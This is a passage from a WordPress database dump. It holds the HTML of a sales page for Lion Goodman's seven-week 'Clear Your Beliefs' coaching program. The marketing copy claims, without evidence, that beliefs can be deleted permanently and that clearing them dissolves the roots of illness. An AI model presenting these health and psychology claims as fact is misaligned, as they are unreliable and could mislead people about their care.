target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:59:57', '2014-12-14 18:59:57', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2044, 2, '2014-12-14 14:04:51', '2014-12-14 19:04:51', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" 